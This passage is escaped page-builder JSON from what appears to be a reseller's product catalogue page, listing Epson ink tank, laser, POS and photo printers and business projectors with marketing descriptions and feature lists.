down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":171,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":78,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 